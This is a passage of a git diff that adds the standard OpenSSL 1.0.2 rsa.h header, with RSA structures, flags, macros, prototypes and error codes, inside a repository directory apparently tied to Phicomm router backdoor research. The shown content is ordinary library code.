+rsa_x931.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+rsa_x931.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rsa_x931.o: ../../include/openssl/symhacks.h ../cryptlib.h rsa_x931.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa.h
new file mode 100644
index 0000000..d2ee374
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa.h
@@ -0,0 +1,664 @@
+/* crypto/rsa/rsa.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_RSA_H
+# define HEADER_RSA_H
+
+# include <openssl/asn1.h>
+
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/crypto.h>
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+# ifdef OPENSSL_NO_RSA
+#  error RSA is disabled.
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Declared already in ossl_typ.h */
+/* typedef struct rsa_st RSA; */
+/* typedef struct rsa_meth_st RSA_METHOD; */
+
+struct rsa_meth_st {
+    const char *name;
+    int (*rsa_pub_enc) (int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding);
+    int (*rsa_pub_dec) (int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding);
+    int (*rsa_priv_enc) (int flen, const unsigned char *from,
+                         unsigned char *to, RSA *rsa, int padding);
+    int (*rsa_priv_dec) (int flen, const unsigned char *from,
+                         unsigned char *to, RSA *rsa, int padding);
+    /* Can be null */
+    int (*rsa_mod_exp) (BIGNUM *r0, const BIGNUM *I, RSA *rsa, BN_CTX *ctx);
+    /* Can be null */
+    int (*bn_mod_exp) (BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+    /* called at new */
+    int (*init) (RSA *rsa);
+    /* called at free */
+    int (*finish) (RSA *rsa);
+    /* RSA_METHOD_FLAG_* things */
+    int flags;
+    /* may be needed! */
+    char *app_data;
+    /*
+     * New sign and verify functions: some libraries don't allow arbitrary
+     * data to be signed/verified: this allows them to be used. Note: for
+     * this to work the RSA_public_decrypt() and RSA_private_encrypt() should
+     * *NOT* be used RSA_sign(), RSA_verify() should be used instead. Note:
+     * for backwards compatibility this functionality is only enabled if the
+     * RSA_FLAG_SIGN_VER option is set in 'flags'.
+     */
+    int (*rsa_sign) (int type,
+                     const unsigned char *m, unsigned int m_length,
+                     unsigned char *sigret, unsigned int *siglen,
+                     const RSA *rsa);
+    int (*rsa_verify) (int dtype, const unsigned char *m,
+                       unsigned int m_length, const unsigned char *sigbuf,
+                       unsigned int siglen, const RSA *rsa);
+    /*
+     * If this callback is NULL, the builtin software RSA key-gen will be
+     * used. This is for behavioural compatibility whilst the code gets
+     * rewired, but one day it would be nice to assume there are no such
+     * things as "builtin software" implementations.
+     */
+    int (*rsa_keygen) (RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
+};
+
+struct rsa_st {
+    /*
+     * The first parameter is used to pickup errors where this is passed
+     * instead of aEVP_PKEY, it is set to 0
+     */
+    int pad;
+    long version;
+    const RSA_METHOD *meth;
+    /* functional reference if 'meth' is ENGINE-provided */
+    ENGINE *engine;
+    BIGNUM *n;
+    BIGNUM *e;
+    BIGNUM *d;
+    BIGNUM *p;
+    BIGNUM *q;
+    BIGNUM *dmp1;
+    BIGNUM *dmq1;
+    BIGNUM *iqmp;
+    /* be careful using this if the RSA structure is shared */
+    CRYPTO_EX_DATA ex_data;
+    int references;
+    int flags;
+    /* Used to cache montgomery values */
+    BN_MONT_CTX *_method_mod_n;
+    BN_MONT_CTX *_method_mod_p;
+    BN_MONT_CTX *_method_mod_q;
+    /*
+     * all BIGNUM values are actually in the following data, if it is not
+     * NULL
+     */
+    char *bignum_data;
+    BN_BLINDING *blinding;
+    BN_BLINDING *mt_blinding;
+};
+
+# ifndef OPENSSL_RSA_MAX_MODULUS_BITS
+#  define OPENSSL_RSA_MAX_MODULUS_BITS   16384
+# endif
+
+# ifndef OPENSSL_RSA_SMALL_MODULUS_BITS
+#  define OPENSSL_RSA_SMALL_MODULUS_BITS 3072
+# endif
+# ifndef OPENSSL_RSA_MAX_PUBEXP_BITS
+
+/* exponent limit enforced for "large" modulus only */
+#  define OPENSSL_RSA_MAX_PUBEXP_BITS    64
+# endif
+
+# define RSA_3   0x3L
+# define RSA_F4  0x10001L
+
+# define RSA_METHOD_FLAG_NO_CHECK        0x0001/* don't check pub/private
+                                                * match */
+
+# define RSA_FLAG_CACHE_PUBLIC           0x0002
+# define RSA_FLAG_CACHE_PRIVATE          0x0004
+# define RSA_FLAG_BLINDING               0x0008
+# define RSA_FLAG_THREAD_SAFE            0x0010
+/*
+ * This flag means the private key operations will be handled by rsa_mod_exp
+ * and that they do not depend on the private key components being present:
+ * for example a key stored in external hardware. Without this flag
+ * bn_mod_exp gets called when private key components are absent.
+ */
+# define RSA_FLAG_EXT_PKEY               0x0020
+
+/*
+ * This flag in the RSA_METHOD enables the new rsa_sign, rsa_verify
+ * functions.
+ */
+# define RSA_FLAG_SIGN_VER               0x0040
+
+/*
+ * new with 0.9.6j and 0.9.7b; the built-in
+ * RSA implementation now uses blinding by
+ * default (ignoring RSA_FLAG_BLINDING),
+ * but other engines might not need it
+ */
+# define RSA_FLAG_NO_BLINDING            0x0080
+/*
+ * new with 0.9.8f; the built-in RSA
+ * implementation now uses constant time
+ * operations by default in private key operations,
+ * e.g., constant time modular exponentiation,
+ * modular inverse without leaking branches,
+ * division without leaking branches. This
+ * flag disables these constant time
+ * operations and results in faster RSA
+ * private key operations.
+ */
+# define RSA_FLAG_NO_CONSTTIME           0x0100
+# ifdef OPENSSL_USE_DEPRECATED
+/* deprecated name for the flag*/
+/*
+ * new with 0.9.7h; the built-in RSA
+ * implementation now uses constant time
+ * modular exponentiation for secret exponents
+ * by default. This flag causes the
+ * faster variable sliding window method to
+ * be used for all exponents.
+ */
+#  define RSA_FLAG_NO_EXP_CONSTTIME RSA_FLAG_NO_CONSTTIME
+# endif
+
+# define EVP_PKEY_CTX_set_rsa_padding(ctx, pad) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, EVP_PKEY_CTRL_RSA_PADDING, \
+                                pad, NULL)
+
+# define EVP_PKEY_CTX_get_rsa_padding(ctx, ppad) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, \
+                                EVP_PKEY_CTRL_GET_RSA_PADDING, 0, ppad)
+
+# define EVP_PKEY_CTX_set_rsa_pss_saltlen(ctx, len) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
+                                (EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
+                                EVP_PKEY_CTRL_RSA_PSS_SALTLEN, \
+                                len, NULL)
+
+# define EVP_PKEY_CTX_get_rsa_pss_saltlen(ctx, plen) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
+                                (EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
+                                EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN, \
+                                0, plen)
+
+# define EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, bits) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
+                                EVP_PKEY_CTRL_RSA_KEYGEN_BITS, bits, NULL)
+
+# define EVP_PKEY_CTX_set_rsa_keygen_pubexp(ctx, pubexp) \
+        EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
+                                EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP, 0, pubexp)
+
+# define  EVP_PKEY_CTX_set_rsa_mgf1_md(ctx, md)  \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
+                        EVP_PKEY_OP_TYPE_SIG | EVP_PKEY_OP_TYPE_CRYPT, \
+                                EVP_PKEY_CTRL_RSA_MGF1_MD, 0, (void *)md)
+
+# define  EVP_PKEY_CTX_set_rsa_oaep_md(ctx, md)  \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_CRYPT,  \
+                                EVP_PKEY_CTRL_RSA_OAEP_MD, 0, (void *)md)
+
+# define  EVP_PKEY_CTX_get_rsa_mgf1_md(ctx, pmd) \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
+                        EVP_PKEY_OP_TYPE_SIG | EVP_PKEY_OP_TYPE_CRYPT, \
+                                EVP_PKEY_CTRL_GET_RSA_MGF1_MD, 0, (void *)pmd)
+
+# define  EVP_PKEY_CTX_get_rsa_oaep_md(ctx, pmd) \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_CRYPT,  \
+                                EVP_PKEY_CTRL_GET_RSA_OAEP_MD, 0, (void *)pmd)
+
+# define  EVP_PKEY_CTX_set0_rsa_oaep_label(ctx, l, llen) \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_CRYPT,  \
+                                EVP_PKEY_CTRL_RSA_OAEP_LABEL, llen, (void *)l)
+
+# define  EVP_PKEY_CTX_get0_rsa_oaep_label(ctx, l)       \
+                EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_CRYPT,  \
+                                EVP_PKEY_CTRL_GET_RSA_OAEP_LABEL, 0, (void *)l)
+
+# define EVP_PKEY_CTRL_RSA_PADDING       (EVP_PKEY_ALG_CTRL + 1)
+# define EVP_PKEY_CTRL_RSA_PSS_SALTLEN   (EVP_PKEY_ALG_CTRL + 2)
+
+# define EVP_PKEY_CTRL_RSA_KEYGEN_BITS   (EVP_PKEY_ALG_CTRL + 3)
+# define EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP (EVP_PKEY_ALG_CTRL + 4)
+# define EVP_PKEY_CTRL_RSA_MGF1_MD       (EVP_PKEY_ALG_CTRL + 5)
+
+# define EVP_PKEY_CTRL_GET_RSA_PADDING           (EVP_PKEY_ALG_CTRL + 6)
+# define EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN       (EVP_PKEY_ALG_CTRL + 7)
+# define EVP_PKEY_CTRL_GET_RSA_MGF1_MD           (EVP_PKEY_ALG_CTRL + 8)
+
+# define EVP_PKEY_CTRL_RSA_OAEP_MD       (EVP_PKEY_ALG_CTRL + 9)
+# define EVP_PKEY_CTRL_RSA_OAEP_LABEL    (EVP_PKEY_ALG_CTRL + 10)
+
+# define EVP_PKEY_CTRL_GET_RSA_OAEP_MD   (EVP_PKEY_ALG_CTRL + 11)
+# define EVP_PKEY_CTRL_GET_RSA_OAEP_LABEL (EVP_PKEY_ALG_CTRL + 12)
+
+# define RSA_PKCS1_PADDING       1
+# define RSA_SSLV23_PADDING      2
+# define RSA_NO_PADDING          3
+# define RSA_PKCS1_OAEP_PADDING  4
+# define RSA_X931_PADDING        5
+/* EVP_PKEY_ only */
+# define RSA_PKCS1_PSS_PADDING   6
+
+# define RSA_PKCS1_PADDING_SIZE  11
+
+# define RSA_set_app_data(s,arg)         RSA_set_ex_data(s,0,arg)
+# define RSA_get_app_data(s)             RSA_get_ex_data(s,0)
+
+RSA *RSA_new(void);
+RSA *RSA_new_method(ENGINE *engine);
+int RSA_size(const RSA *rsa);
+
+/* Deprecated version */
+# ifndef OPENSSL_NO_DEPRECATED
+RSA *RSA_generate_key(int bits, unsigned long e, void
+                       (*callback) (int, int, void *), void *cb_arg);
+# endif                         /* !defined(OPENSSL_NO_DEPRECATED) */
+
+/* New version */
+int RSA_generate_key_ex(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
+
+int RSA_check_key(const RSA *);
+        /* next 4 return -1 on error */
+int RSA_public_encrypt(int flen, const unsigned char *from,
+                       unsigned char *to, RSA *rsa, int padding);
+int RSA_private_encrypt(int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding);
+int RSA_public_decrypt(int flen, const unsigned char *from,
+                       unsigned char *to, RSA *rsa, int padding);
+int RSA_private_decrypt(int flen, const unsigned char *from,
+                        unsigned char *to, RSA *rsa, int padding);
+void RSA_free(RSA *r);
+/* "up" the RSA object's reference count */
+int RSA_up_ref(RSA *r);
+
+int RSA_flags(const RSA *r);
+
+void RSA_set_default_method(const RSA_METHOD *meth);
+const RSA_METHOD *RSA_get_default_method(void);
+const RSA_METHOD *RSA_get_method(const RSA *rsa);
+int RSA_set_method(RSA *rsa, const RSA_METHOD *meth);
+
+/* This function needs the memory locking malloc callbacks to be installed */
+int RSA_memory_lock(RSA *r);
+
+/* these are the actual SSLeay RSA functions */
+const RSA_METHOD *RSA_PKCS1_SSLeay(void);
+
+const RSA_METHOD *RSA_null_method(void);
+
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(RSA, RSAPublicKey)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(RSA, RSAPrivateKey)
+
+typedef struct rsa_pss_params_st {
+    X509_ALGOR *hashAlgorithm;
+    X509_ALGOR *maskGenAlgorithm;
+    ASN1_INTEGER *saltLength;
+    ASN1_INTEGER *trailerField;
+} RSA_PSS_PARAMS;
+
+DECLARE_ASN1_FUNCTIONS(RSA_PSS_PARAMS)
+
+typedef struct rsa_oaep_params_st {
+    X509_ALGOR *hashFunc;
+    X509_ALGOR *maskGenFunc;
+    X509_ALGOR *pSourceFunc;
+} RSA_OAEP_PARAMS;
+
+DECLARE_ASN1_FUNCTIONS(RSA_OAEP_PARAMS)
+
+# ifndef OPENSSL_NO_FP_API
+int RSA_print_fp(FILE *fp, const RSA *r, int offset);
+# endif
+
+# ifndef OPENSSL_NO_BIO
+int RSA_print(BIO *bp, const RSA *r, int offset);
+# endif
+
+# ifndef OPENSSL_NO_RC4
+int i2d_RSA_NET(const RSA *a, unsigned char **pp,
+                int (*cb) (char *buf, int len, const char *prompt,
+                           int verify), int sgckey);
+RSA *d2i_RSA_NET(RSA **a, const unsigned char **pp, long length,
+                 int (*cb) (char *buf, int len, const char *prompt,
+                            int verify), int sgckey);
+
+int i2d_Netscape_RSA(const RSA *a, unsigned char **pp,
+                     int (*cb) (char *buf, int len, const char *prompt,
+                                int verify));
+RSA *d2i_Netscape_RSA(RSA **a, const unsigned char **pp, long length,
+                      int (*cb) (char *buf, int len, const char *prompt,
+                                 int verify));
+# endif
+
+/*
+ * The following 2 functions sign and verify a X509_SIG ASN1 object inside
+ * PKCS#1 padded RSA encryption
+ */
+int RSA_sign(int type, const unsigned char *m, unsigned int m_length,
+             unsigned char *sigret, unsigned int *siglen, RSA *rsa);
+int RSA_verify(int type, const unsigned char *m, unsigned int m_length,
+               const unsigned char *sigbuf, unsigned int siglen, RSA *rsa);
+
+/*
+ * The following 2 function sign and verify a ASN1_OCTET_STRING object inside
+ * PKCS#1 padded RSA encryption
+ */
+int RSA_sign_ASN1_OCTET_STRING(int type,
+                               const unsigned char *m, unsigned int m_length,
+                               unsigned char *sigret, unsigned int *siglen,
+                               RSA *rsa);
+int RSA_verify_ASN1_OCTET_STRING(int type, const unsigned char *m,
+                                 unsigned int m_length, unsigned char *sigbuf,
+                                 unsigned int siglen, RSA *rsa);
+
+int RSA_blinding_on(RSA *rsa, BN_CTX *ctx);
+void RSA_blinding_off(RSA *rsa);
+BN_BLINDING *RSA_setup_blinding(RSA *rsa, BN_CTX *ctx);
+
+int RSA_padding_add_PKCS1_type_1(unsigned char *to, int tlen,
+                                 const unsigned char *f, int fl);
+int RSA_padding_check_PKCS1_type_1(unsigned char *to, int tlen,
+                                   const unsigned char *f, int fl,
+                                   int rsa_len);
+int RSA_padding_add_PKCS1_type_2(unsigned char *to, int tlen,
+                                 const unsigned char *f, int fl);
+int RSA_padding_check_PKCS1_type_2(unsigned char *to, int tlen,
+                                   const unsigned char *f, int fl,
+                                   int rsa_len);
+int PKCS1_MGF1(unsigned char *mask, long len, const unsigned char *seed,
+               long seedlen, const EVP_MD *dgst);
+int RSA_padding_add_PKCS1_OAEP(unsigned char *to, int tlen,
+                               const unsigned char *f, int fl,
+                               const unsigned char *p, int pl);
+int RSA_padding_check_PKCS1_OAEP(unsigned char *to, int tlen,
+                                 const unsigned char *f, int fl, int rsa_len,
+                                 const unsigned char *p, int pl);
+int RSA_padding_add_PKCS1_OAEP_mgf1(unsigned char *to, int tlen,
+                                    const unsigned char *from, int flen,
+                                    const unsigned char *param, int plen,
+                                    const EVP_MD *md, const EVP_MD *mgf1md);
+int RSA_padding_check_PKCS1_OAEP_mgf1(unsigned char *to, int tlen,
+                                      const unsigned char *from, int flen,
+                                      int num, const unsigned char *param,
+                                      int plen, const EVP_MD *md,
+                                      const EVP_MD *mgf1md);
+int RSA_padding_add_SSLv23(unsigned char *to, int tlen,
+                           const unsigned char *f, int fl);
+int RSA_padding_check_SSLv23(unsigned char *to, int tlen,
+                             const unsigned char *f, int fl, int rsa_len);
+int RSA_padding_add_none(unsigned char *to, int tlen, const unsigned char *f,
+                         int fl);
+int RSA_padding_check_none(unsigned char *to, int tlen,
+                           const unsigned char *f, int fl, int rsa_len);
+int RSA_padding_add_X931(unsigned char *to, int tlen, const unsigned char *f,
+                         int fl);
+int RSA_padding_check_X931(unsigned char *to, int tlen,
+                           const unsigned char *f, int fl, int rsa_len);
+int RSA_X931_hash_id(int nid);
+
+int RSA_verify_PKCS1_PSS(RSA *rsa, const unsigned char *mHash,
+                         const EVP_MD *Hash, const unsigned char *EM,
+                         int sLen);
+int RSA_padding_add_PKCS1_PSS(RSA *rsa, unsigned char *EM,
+                              const unsigned char *mHash, const EVP_MD *Hash,
+                              int sLen);
+
+int RSA_verify_PKCS1_PSS_mgf1(RSA *rsa, const unsigned char *mHash,
+                              const EVP_MD *Hash, const EVP_MD *mgf1Hash,
+                              const unsigned char *EM, int sLen);
+
+int RSA_padding_add_PKCS1_PSS_mgf1(RSA *rsa, unsigned char *EM,
+                                   const unsigned char *mHash,
+                                   const EVP_MD *Hash, const EVP_MD *mgf1Hash,
+                                   int sLen);
+
+int RSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+int RSA_set_ex_data(RSA *r, int idx, void *arg);
+void *RSA_get_ex_data(const RSA *r, int idx);
+
+RSA *RSAPublicKey_dup(RSA *rsa);
+RSA *RSAPrivateKey_dup(RSA *rsa);
+
+/*
+ * If this flag is set the RSA method is FIPS compliant and can be used in
+ * FIPS mode. This is set in the validated module method. If an application
+ * sets this flag in its own methods it is its responsibility to ensure the
+ * result is compliant.
+ */
+
+# define RSA_FLAG_FIPS_METHOD                    0x0400
+
+/*
+ * If this flag is set the operations normally disabled in FIPS mode are
+ * permitted it is then the applications responsibility to ensure that the
+ * usage is compliant.
+ */
+
+# define RSA_FLAG_NON_FIPS_ALLOW                 0x0400
+/*
+ * Application has decided PRNG is good enough to generate a key: don't
+ * check.
+ */
+# define RSA_FLAG_CHECKED                        0x0800
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_RSA_strings(void);
+
+/* Error codes for the RSA functions. */
+
+/* Function codes. */
+# define RSA_F_CHECK_PADDING_MD                           140
+# define RSA_F_DO_RSA_PRINT                               146
+# define RSA_F_INT_RSA_VERIFY                             145
+# define RSA_F_MEMORY_LOCK                                100
+# define RSA_F_OLD_RSA_PRIV_DECODE                        147
+# define RSA_F_PKEY_RSA_CTRL                              143
+# define RSA_F_PKEY_RSA_CTRL_STR                          144
+# define RSA_F_PKEY_RSA_SIGN                              142
+# define RSA_F_PKEY_RSA_VERIFY                            154
+# define RSA_F_PKEY_RSA_VERIFYRECOVER                     141
+# define RSA_F_RSA_ALGOR_TO_MD                            157
+# define RSA_F_RSA_BUILTIN_KEYGEN                         129
+# define RSA_F_RSA_CHECK_KEY                              123
+# define RSA_F_RSA_CMS_DECRYPT                            158
+# define RSA_F_RSA_EAY_PRIVATE_DECRYPT                    101
+# define RSA_F_RSA_EAY_PRIVATE_ENCRYPT                    102
+# define RSA_F_RSA_EAY_PUBLIC_DECRYPT                     103
+# define RSA_F_RSA_EAY_PUBLIC_ENCRYPT                     104
+# define RSA_F_RSA_GENERATE_KEY                           105
+# define RSA_F_RSA_GENERATE_KEY_EX                        155
+# define RSA_F_RSA_ITEM_VERIFY                            156
+# define RSA_F_RSA_MEMORY_LOCK                            130
+# define RSA_F_RSA_MGF1_TO_MD                             159
+# define RSA_F_RSA_NEW_METHOD                             106
+# define RSA_F_RSA_NULL                                   124
+# define RSA_F_RSA_NULL_MOD_EXP                           131
+# define RSA_F_RSA_NULL_PRIVATE_DECRYPT                   132
+# define RSA_F_RSA_NULL_PRIVATE_ENCRYPT                   133
+# define RSA_F_RSA_NULL_PUBLIC_DECRYPT                    134
+# define RSA_F_RSA_NULL_PUBLIC_ENCRYPT                    135
+# define RSA_F_RSA_PADDING_ADD_NONE                       107
+# define RSA_F_RSA_PADDING_ADD_PKCS1_OAEP                 121
+# define RSA_F_RSA_PADDING_ADD_PKCS1_OAEP_MGF1            160
+# define RSA_F_RSA_PADDING_ADD_PKCS1_PSS                  125
+# define RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1             148
+# define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_1               108
+# define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_2               109
+# define RSA_F_RSA_PADDING_ADD_SSLV23                     110
+# define RSA_F_RSA_PADDING_ADD_X931                       127
+# define RSA_F_RSA_PADDING_CHECK_NONE                     111
+# define RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP               122
+# define RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP_MGF1          161
+# define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1             112
+# define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2             113
+# define RSA_F_RSA_PADDING_CHECK_SSLV23                   114
+# define RSA_F_RSA_PADDING_CHECK_X931                     128
+# define RSA_F_RSA_PRINT                                  115
+# define RSA_F_RSA_PRINT_FP                               116
+# define RSA_F_RSA_PRIVATE_DECRYPT                        150
+# define RSA_F_RSA_PRIVATE_ENCRYPT                        151
+# define RSA_F_RSA_PRIV_DECODE                            137
+# define RSA_F_RSA_PRIV_ENCODE                            138
+# define RSA_F_RSA_PSS_TO_CTX                             162
+# define RSA_F_RSA_PUBLIC_DECRYPT                         152
+# define RSA_F_RSA_PUBLIC_ENCRYPT                         153
+# define RSA_F_RSA_PUB_DECODE                             139
+# define RSA_F_RSA_SETUP_BLINDING                         136
+# define RSA_F_RSA_SIGN                                   117
+# define RSA_F_RSA_SIGN_ASN1_OCTET_STRING                 118
+# define RSA_F_RSA_VERIFY                                 119
+# define RSA_F_RSA_VERIFY_ASN1_OCTET_STRING               120
+# define RSA_F_RSA_VERIFY_PKCS1_PSS                       126
+# define RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1                  149
+
+/* Reason codes. */
+# define RSA_R_ALGORITHM_MISMATCH                         100
+# define RSA_R_BAD_E_VALUE                                101
+# define RSA_R_BAD_FIXED_HEADER_DECRYPT                   102
+# define RSA_R_BAD_PAD_BYTE_COUNT                         103
+# define RSA_R_BAD_SIGNATURE                              104
+# define RSA_R_BLOCK_TYPE_IS_NOT_01                       106
+# define RSA_R_BLOCK_TYPE_IS_NOT_02                       107
+# define RSA_R_DATA_GREATER_THAN_MOD_LEN                  108
+# define RSA_R_DATA_TOO_LARGE                             109
+# define RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE                110
+# define RSA_R_DATA_TOO_LARGE_FOR_MODULUS                 132
+# define RSA_R_DATA_TOO_SMALL                             111
+# define RSA_R_DATA_TOO_SMALL_FOR_KEY_SIZE                122
+# define RSA_R_DIGEST_DOES_NOT_MATCH                      166
+# define RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY                 112
+# define RSA_R_DMP1_NOT_CONGRUENT_TO_D                    124
+# define RSA_R_DMQ1_NOT_CONGRUENT_TO_D                    125
+# define RSA_R_D_E_NOT_CONGRUENT_TO_1                     123
+# define RSA_R_FIRST_OCTET_INVALID                        133
+# define RSA_R_ILLEGAL_OR_UNSUPPORTED_PADDING_MODE        144
+# define RSA_R_INVALID_DIGEST                             160
+# define RSA_R_INVALID_DIGEST_LENGTH                      143
+# define RSA_R_INVALID_HEADER                             137
+# define RSA_R_INVALID_KEYBITS                            145
+# define RSA_R_INVALID_LABEL                              161
+# define RSA_R_INVALID_MESSAGE_LENGTH                     131
+# define RSA_R_INVALID_MGF1_MD                            156
+# define RSA_R_INVALID_OAEP_PARAMETERS                    162
+# define RSA_R_INVALID_PADDING                            138
+# define RSA_R_INVALID_PADDING_MODE                       141
+# define RSA_R_INVALID_PSS_PARAMETERS                     149
+# define RSA_R_INVALID_PSS_SALTLEN                        146
+# define RSA_R_INVALID_SALT_LENGTH                        150
+# define RSA_R_INVALID_TRAILER                            139
+# define RSA_R_INVALID_X931_DIGEST                        142
+# define RSA_R_IQMP_NOT_INVERSE_OF_Q                      126
+# define RSA_R_KEY_SIZE_TOO_SMALL                         120
+# define RSA_R_LAST_OCTET_INVALID                         134
+# define RSA_R_MODULUS_TOO_LARGE                          105
+# define RSA_R_NON_FIPS_RSA_METHOD                        157
+# define RSA_R_NO_PUBLIC_EXPONENT                         140
+# define RSA_R_NULL_BEFORE_BLOCK_MISSING                  113
+# define RSA_R_N_DOES_NOT_EQUAL_P_Q                       127
+# define RSA_R_OAEP_DECODING_ERROR                        121
+# define RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE         158
+# define RSA_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE   148
+# define RSA_R_PADDING_CHECK_FAILED                       114
+# define RSA_R_PKCS_DECODING_ERROR                        159
+# define RSA_R_P_NOT_PRIME                                128
+# define RSA_R_Q_NOT_PRIME                                129
+# define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED               130
+# define RSA_R_SLEN_CHECK_FAILED                          136
+# define RSA_R_SLEN_RECOVERY_FAILED                       135
+# define RSA_R_SSLV3_ROLLBACK_ATTACK                      115
+# define RSA_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 116
